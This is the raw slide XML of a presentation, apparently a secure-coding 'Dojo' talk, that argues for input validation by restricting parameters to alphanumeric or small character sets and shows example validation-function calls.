        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEE61608-FDDA-8447-939A-E9879E1FC231}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1632331" y="3276298"/>
            <a:ext cx="1626920" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dojo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2F9F10F-EA6C-5444-8A9F-52B318B0CFF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1632331" y="2659559"/>
            <a:ext cx="426744" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="280248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Both</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="222053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1A5949-AE6A-3C4F-A366-BAE53F97BDE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="117695"/>
            <a:ext cx="12192000" cy="6570328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCC50F44-76E6-624D-8FE1-8B98F2E0AC66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1041148"/>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1268D3-9F5A-2F44-A737-AC1672C34781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="437131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92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3587277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BB62-0AA3-8F47-BB80-B24BAB1CABBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="233481"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0"/>
              <a:t>Special Characters Not Needed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4642B792-1AE0-864D-AB71-3F69ADC4A11F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1553935"/>
            <a:ext cx="4876800" cy="4364613"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many parameter types not intended to contain symbols or punctuation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many not even intended to contain Unicode characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Parameters going into database queries such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>true/false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>asc/desc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>have even a smaller character set</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="Group 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7E74587-97AA-C345-BCAF-8DF2009E5C4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5889171" y="1553935"/>
            <a:ext cx="5943600" cy="4860530"/>
            <a:chOff x="5715000" y="1367716"/>
            <a:chExt cx="5943600" cy="4860530"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="Picture 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF863AEE-2EBD-6B4D-88DA-821C5E0E4C7D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5715000" y="1367716"/>
              <a:ext cx="5943600" cy="4076700"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6780DA4C-9011-B24B-8624-9532E77966FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7707086" y="3797952"/>
              <a:ext cx="3439885" cy="348343"/>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8CB66FD-D5F6-624A-B15C-0D2C8522CDB9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8926287" y="2840715"/>
              <a:ext cx="380999" cy="85926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B5A22B-52B7-AD49-AF0D-C86E23C1E795}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8146100" y="2194384"/>
              <a:ext cx="35125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urier" pitchFamily="2" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Alphanumeric</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Rectangle 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49168860-1CBB-2844-80E8-A4FD2423462D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9876928" y="4912829"/>
              <a:ext cx="1270043" cy="221369"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="444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D52D655-FFBD-3F40-A1A0-D705AD62C59E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5914528" y="5581915"/>
              <a:ext cx="51764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ourier" pitchFamily="2" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Alphanumeric + .-_</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="17" name="Straight Arrow Connector 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7665C6D0-8C62-9B47-9C23-5C3E40DDD151}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9717359" y="5266998"/>
              <a:ext cx="373698" cy="2753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189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C20-0E38-0147-B8F3-D036379F9EA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467904" y="0"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Input Validation Function Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F23FA2D7-A93D-CA4C-B436-AB154E0C59D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="986122"/>
            <a:ext cx="12192000" cy="5317859"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="94186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70BF-8FA6-BE45-9844-52452398A071}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>A Simple Multi-Purpose Function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32288CDF-F873-8643-A867-76CE07C52673}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952214" y="1690689"/>
            <a:ext cx="10401586" cy="3543464"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="40000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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"true"</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"desc"</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>21845816438168</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a: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"0x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>0709750fa566</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Cr2i7nHq6qiMEs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>isAlphanumOrEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>"site.local"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>'.'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="355980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34D15BD-375A-C540-AE28-D974A1E68FB6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noGrp="1"/>
              </p:cNvSpPr>
              <p:nvPr>
                <p:ph type="title"/>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4395867" y="0"/>
                <a:ext cx="7571732" cy="1067721"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:alpha val="0"/>
                </a:schemeClr>
              </a:solidFill>
            </p:spPr>
            <p:txBody>
              <a:bodyPr>
                <a:no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ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <m:t>𝑽𝒖𝒍𝒏𝒆𝒓𝒂𝒃𝒊𝒍𝒊𝒕𝒊𝒆𝒔</m:t>
                      </m:r>
                      <m:r>
                        <a:rPr lang="en-US" sz="3200" b="1" i="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="0070C0"/>
                          </a:solidFill>
                          <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                          <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <m:t>=</m:t>
                      </m:r>
                      <m:r>
                        <a:rPr lang="en-US" sz="3200" b="1" i="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="0070C0"/>
                          </a:solidFill>
                          <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                          <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <m:t>𝑭</m:t>
                      </m:r>
                      <m:r>
                        <a:rPr lang="en-US" sz="3200" b="1" i="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="0070C0"/>
                          </a:solidFill>
                          <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                          <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <m:t>(</m:t>
                      </m:r>
                      <m:f>
                        <m:fPr>
                          <m:ctrlPr>
                            <a:rPr lang="en-US" sz="3200" b="1" i="1" smtClean="0">
                              <a:solidFill>
                                <a:srgbClr val="0070C0"/>
                              </a:solidFill>
                              <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                              <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                            </a:rPr>
                          </m:ctrlPr>
                        </m:fPr>
                        <m:num>
                          <m:r>
                            <a:rPr lang="en-US" sz="3200" b="1" i="1" smtClean="0">
                              <a:solidFill>
                                <a:srgbClr val="FFFF00"/>
                              </a:solidFill>
                              <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                              <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                            </a:rPr>
                            <m:t>𝑰𝒏𝒑𝒖𝒕</m:t>
                          </m:r>
                        </m:num>
                        <m:den>
                          <m:r>
                            <a:rPr lang="en-US" sz="3200" b="1" i="1" smtClean="0">
                              <a:solidFill>
                                <a:srgbClr val="0070C0"/>
                              </a:solidFill>
                              <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                              <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                            </a:rPr>
                            <m:t>𝟏</m:t>
                          </m:r>
                          <m:r>
                            <a:rPr lang="en-US" sz="3200" b="1" i="1" smtClean="0">
                              <a:solidFill>
                                <a:srgbClr val="0070C0"/>
                              </a:solidFill>
                              <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                              <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                            </a:rPr>
                            <m:t>+</m:t>
                          </m:r>
                          <m:r>
                            <a:rPr lang="en-US" sz="3200" b="1" i="1" smtClean="0">
                              <a:solidFill>
                                <a:schemeClr val="tx1"/>
                              </a:solidFill>
                              <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                              <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                            </a:rPr>
                            <m:t>𝑽𝒂𝒍𝒊𝒅𝒂𝒕𝒊𝒐𝒏</m:t>
                          </m:r>
                        </m:den>
                      </m:f>
                      <m:r>
                        <a:rPr lang="en-US" sz="3200" b="1" i="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="0070C0"/>
                          </a:solidFill>
                          <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                          <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <m:t>)</m:t>
                      </m:r>
                    </m:oMath>
                  </m:oMathPara>
                </a14:m>
                <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Bradley Hand" pitchFamily="2" charset="77"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2" name="Title 1">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{234D15BD-375A-C540-AE28-D974A1E68FB6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
              </p:cNvSpPr>
              <p:nvPr>
                <p:ph type="title"/>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4395867" y="0"/>
                <a:ext cx="7571732" cy="1067721"/>
              </a:xfrm>
              <a:blipFill>
                <a:blip r:embed="rId4"/>
                <a:stretch>
                  <a:fillRect b="-3571"/>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A181669B-F0EB-F848-9808-0472BD59F516}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7127310" y="3356976"/>
            <a:ext cx="1054423" cy="2391080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Picture 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFBC6325-C9B9-BD43-85DB-B66E874B23C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8580329" y="3356975"/>
            <a:ext cx="1075672" cy="2391079"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Picture 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC6D2145-CF9A-7541-A481-2A9497E3BEED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10054597" y="2849421"/>
            <a:ext cx="1075673" cy="2679178"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
